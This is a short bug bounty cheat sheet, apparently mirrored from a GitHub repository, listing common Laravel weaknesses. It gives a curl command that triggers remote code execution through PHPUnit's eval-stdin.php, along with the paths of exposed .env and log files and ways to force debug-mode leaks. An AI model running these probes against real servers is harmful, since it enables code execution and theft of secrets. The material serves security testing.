ch0ic3/AllAboutBugBounty

mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 18:36:12 +00:00

Muhammad Daffa 8b8613272e

Laravel [1]

Create laravel tips and add 4 tips

2020-09-08 17:26:12 +07:00

1005 B

Raw Blame History

Common bug in laravel framework

Laravel PHPUnit Remote Code Execution

Full Path Exploit : http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Affected versions : Before 4.8.28 and 5.x before 5.6.3

Command

curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Exposed environment variables

Full Path Exploit : http://target.com/.env

Exposed log files

Full Path Exploit : http://target.com/storage/logs/laravel.log

Laravel Debug Mode Enabled

Using SQL injection query in GET or POST method
Try path /logout (ex:target.com/logout)
Using [] in paramater (ex:target.com/param[]=0)

Source: Nakanosec